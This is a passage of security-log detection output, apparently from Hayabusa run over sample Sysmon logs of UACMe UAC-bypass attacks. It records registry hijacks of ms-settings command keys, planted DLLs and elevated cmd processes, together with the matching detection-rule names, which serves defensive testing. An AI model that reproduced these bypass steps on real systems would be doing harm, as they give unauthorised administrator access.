PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 10:14:02.589 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 33 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:02.589 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:02.589 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:02.929 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:02.929 +00:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_sysmon/registry_set/registry_set_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:02.929 +00:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,rules/sigma/registry_sysmon/registry_event/registry_event_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:02.934 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:02.934 +00:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,rules/sigma/registry_sysmon/registry_event/registry_event_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:07.652 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3fb | PID: 4208 | PGUID: 747F3D96-5E6F-5D45-0000-00108F969D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:07.665 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 324 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4060 | PGUID: 747F3D96-5E6F-5D45-0000-00103B989D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:08.065 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3b3 | PID: 8180 | PGUID: 747F3D96-5E6F-5D45-0000-001014CA9D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:08.472 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\fodhelper.exe"" | LID: 0x18d3b3 | PID: 3656 | PGUID: 747F3D96-5E70-5D45-0000-0010FCDD9D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:08.472 +00:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:08.681 +00:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | DeleteKey: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:08.681 +00:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_sysmon/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:08.799 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:51:46.511 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 32 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:46.511 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:46.511 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:46.647 +00:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 32 | Path: C:\Users\IEUser\AppData\Local\Temp\OskSupport.dll | Process: C:\Windows\explorer.exe | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:46.647 +00:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_win_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:46.685 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-6742-5D45-0000-00102A72B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:47.219 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 324 | PGUID: 747F3D96-6743-5D45-0000-0010DAA8B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:48.431 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 6456 | PGUID: 747F3D96-6743-5D45-0000-001068D7B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:48.675 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 5840 | PGUID: 747F3D96-6744-5D45-0000-00108BE4B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:48.696 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5124 | PGUID: 747F3D96-6744-5D45-0000-00102FE6B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:49.371 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3b3 | PID: 5524 | PGUID: 747F3D96-6744-5D45-0000-0010040CB600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 11:23:15.364 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 30 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:15.364 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:15.364 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:15.560 +00:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 30 | Path: C:\Users\IEUser\AppData\Local\Temp\wow64log.dll | Process: C:\Windows\explorer.exe | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:15.579 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3640 | PGUID: 747F3D96-6EA3-5D45-0000-0010FB58E100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:17.433 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3fb | PID: 3340 | PGUID: 747F3D96-6EA4-5D45-0000-0010DD92E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:17.541 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6292 | PGUID: 747F3D96-6EA5-5D45-0000-0010E19FE100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:18.619 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3b3 | PID: 6312 | PGUID: 747F3D96-6EA5-5D45-0000-0010C5C4E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:18.666 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 932 | PGUID: 747F3D96-6EA5-5D45-0000-00107AC9E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:18.694 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312 | LID: 0x3e7 | PID: 6068 | PGUID: 747F3D96-6EA5-5D45-0000-001032CCE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:18.715 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 | Process: C:\Windows\SysWOW64\WerFault.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\syswow64\wusa.exe"" | LID: 0x18d3b3 | PID: 4348 | PGUID: 747F3D96-6EA5-5D45-0000-00107CCEE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:18.803 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4768 | PGUID: 747F3D96-6EA5-5D45-0000-0010EED0E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:18.824 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348 | LID: 0x3e7 | PID: 7844 | PGUID: 747F3D96-6EA5-5D45-0000-00108FD3E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 12:06:53.680 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 23 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:53.680 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:53.680 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:53.933 +00:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 23 | Path: C:\Users\IEUser\AppData\Local\Temp\dismcore.dll | Process: C:\Windows\explorer.exe | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:53.943 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7560 | PGUID: 747F3D96-78DD-5D45-0000-0010B7B10301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:54.900 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3fb | PID: 3876 | PGUID: 747F3D96-78DE-5D45-0000-0010B3F60301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:54.972 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 406 000002806444C740 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2040 | PGUID: 747F3D96-78DE-5D45-0000-0010FFFE0301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:55.455 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3b3 | PID: 216 | PGUID: 747F3D96-78DF-5D45-0000-0010622F0401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:55.620 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | Process: C:\Windows\System32\Dism.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | LID: 0x18d3b3 | PID: 5756 | PGUID: 747F3D96-78DF-5D45-0000-0010BD350401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:55.620 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:55.820 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | LID: 0x18d3b3 | PID: 4320 | PGUID: 747F3D96-78DF-5D45-0000-0010EF400401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:08:13.636 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 22 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:13.636 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:13.636 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:13.818 +00:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 22 | Path: C:\Users\IEUser\AppData\Local\Temp\comctl32.dll | Process: C:\Windows\explorer.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:13.874 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7472 | PGUID: 747F3D96-792D-5D45-0000-00107A250601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:14.372 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC9C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6716 | PGUID: 747F3D96-792E-5D45-0000-001001560601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:14.977 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC890 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8072 | PGUID: 747F3D96-792E-5D45-0000-00104A760601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:15.664 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC170 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2388 | PGUID: 747F3D96-792F-5D45-0000-00103DA80601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:16.721 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3fb | PID: 4604 | PGUID: 747F3D96-7930-5D45-0000-001027DC0601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx 